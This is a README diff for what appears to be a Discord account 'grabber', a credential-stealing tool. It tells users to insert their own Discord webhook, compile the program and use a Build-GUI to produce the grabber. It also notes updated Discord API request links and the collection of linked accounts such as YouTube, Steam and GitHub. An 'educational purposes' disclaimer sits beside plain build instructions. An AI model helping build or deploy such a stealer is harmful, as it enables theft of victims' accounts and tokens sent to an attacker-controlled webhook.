DDO3-del/DDO3-grabber/README.md

 **The program has been made for educational purposes, do not use it for malicious purposes.**<br>
 You only have to input your Discord webhook on line nine and compile it.

+> **HOW TO RUN**
+When you have downloaded the file you will need to open and start the Build-GUI.
+After you have started the Build-GUI it will show you how to make the grabber.

 > **NOTES**
 I updated all old Discord API versions on request links.
 For the account connections (linked accounts) like YouTube, Steam, Github...